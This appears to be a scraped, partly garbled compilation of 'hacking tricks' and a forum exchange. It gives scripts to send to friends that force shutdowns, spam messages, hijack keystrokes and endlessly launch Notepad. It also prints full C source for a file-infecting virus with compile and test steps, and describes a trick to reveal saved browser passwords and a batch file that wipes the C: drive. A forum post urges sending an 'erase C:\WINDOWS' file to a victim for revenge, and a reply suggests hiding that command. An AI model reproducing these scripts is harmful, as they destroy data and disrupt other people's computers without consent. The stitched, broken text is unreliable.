Академический Документы
Профессиональный Документы
Культура Документы
Type the following codes and save it as cycle.bat @ECHO off :Begin msg * Hi msg * Are you having fun? msg * I am! msg * Lets have fun together! msg * Because you have been o-w-n-e-d GOTO BEGIN
CONVEY YOUR FRIEND A MESSAGE AND SHUT DOWN HIS/ HER COMPUTER.
Type the following code and save it as message.bat and send it to your friends to shutdown their computer. @echo off msg * I don t like you shutdown -c Hahahah You are Doomed -s
FRUSTRATE YOUR FRIEND BY MAKING THEIR KEYBOARD HIT ENTER SIMULTANEOUSLY WHENEVER THEY PRESS A KEY :
Type the following code and save it as enter.vbs and send to your friends.
HACK YOUR FRIEND S KEYBOARD AND MAKE HIM TYPE YOU ARE A FOOL SIMULTANEOUSLY:
Type the following code and save it as fool.vbs Set wshShell = wscript.CreateObject( WScript.Shell ) do wscript.sleep 100 wshshell.sendkeys You are a fool. loop
WshShell.SendKeys WScript.Sleep 500 WshShell.SendKeys WScript.Sleep 500 WshShell.SendKeys WScript.Sleep 500 WshShell.SendKeys WScript.Sleep 500 WshShell.SendKeys WScript.Sleep 500 WshShell.SendKeys
Ia mg ood th ank s!
FRUSTRATE YOUR FRIEND BY MAKING THEIR KEYBOARD HIT BACKSPACE SIMULTANEOUSLY WHENEVER THEY PRESS A KEY :
Type the following code and save it as backspace.vbs MsgBox Let s rock and roll Set wshShell =wscript.CreateObject( WScript.Shell ) do wscript.sleep 100 wshshell.sendkeys {bs} loop
STEPS:
1. Launch Notepad and paste the following code and save the file as notepad.bat.
CODE:
@ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top
STEPS:
1. Just open any web browser, and open any website for which username and passwords are stored already on the computer you are using. lets say www.gmail.com
2. Now if any username and password are stored on your system for gmail, then it will be visible in login area, as username and ***** stars in place of password. 3. Now if you want to see the hidden password behind these stars, then just copy the given javacode and replace it with url of gmail in addressbar of ur browser. and press enter.
This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is
also capable of spreading the infection to another file and so on. Here s the source code of the virus #include<stdio.h> #include<io.h> #include<dos.h> #include<dir.h> #include<conio.h> #include<time.h> FILE *virus,*host; int done,a=0; unsigned long x; char buff[2048]; struct ffblk ffblk; clock_t st,end; void main() { st=clock(); clrscr(); done=findfirst( *.* ,&ffblk,0); while(!done) { virus=fopen(_argv[0], rb ); host=fopen(ffblk.ff_name, rb+ ); if(host==NULL) goto next; x=89088; printf( Infecting %s\n ,ffblk.ff_name,a); while(x>2048) { fread(buff,2048,1,virus); fwrite(buff,2048,1,host); x-=2048; } fread(buff,x,1,virus); fwrite(buff,x,1,host); program.
a++; next: { fcloseall(); done=findnext(&ffblk); } } printf( DONE! (Total Files Infected= %d) ,a); end=clock(); printf( TIME TAKEN=%f SEC\n , (end-st)/CLK_TCK); getch(); }
COMPILING METHOD:
1. Load the program in the compiler, press Alt-F9 to compile 2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER) 3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT S SIZE) 4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT) 5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
1. Compile once,note down the generated EXE file length in bytes 2. Change the value of X in source code to this length in bytes 3. Recompile it.The new EXE file is ready to infect
HOW TO TEST:
1. Open new empty folder 2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER) 3. Run the virus EXE file there you will see all the files in the current directory get infected. 4. All the infected files will be ready to reinfect That s it
And save that as .bat not .txt and RUN IT It will delete the content of C:\ drive...
PLEASE NoTe::::: dont run that .bat file on ur system .... it will delet c:... IF ANY ONE..... DARE TO ......RUN ...U LOST ..........CONTENTS OF C drive EVEN I DIDN't TRY THIS........
QUOTE
The only thing you need is Notepad . Now, to test it, create a textfile calledTEST.txt(empty) in C:\ Now in your notepad type "erase C:\TEST.txt" (without the quotes). Then do "Save As..." and save it as"Test.cmd". Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone. Now, the real work begins: Go to notepad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as findoutaname.cmd. Now DON'T run the file or you'll lose your WINDOWS map. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX map is gone. And have to install LINUX/WINDOWS again.
ADITYA
Apr 22 2006, 12:16 PM
Ok first of all this is not a virus even in the lamest terms. This is just a DOS batch file. You can also save the file as .bat file and the functioning will be the same. This file won't erase anything without confirmation from the user. You've tried to delete just a single file thats why it didn't ask for confirmation from you. Try deleting a folder with this file and you will get the following message in a DOS window:
CODE
erase c:\<directory name> c:\<directory name>\*, Are you sure (Y/N)? Unless you press 'y' nothing will happen. A virus, by definition, is not just supposed to damage a computer, it is also supposed to spread on its own. And this file can't even damage a computer without affirmation from the user. I wonder who would be dumb enough to affirm the destruction of his own computer. Atleast use "echo off" before the erase statement to hide the "erase c:\windows" command being displayed. And by the way, I think you haven't ever used Linux. Otherwise you would know that Linux doesn't support DOS commands and neither does it use the Windows/DOS filesystem.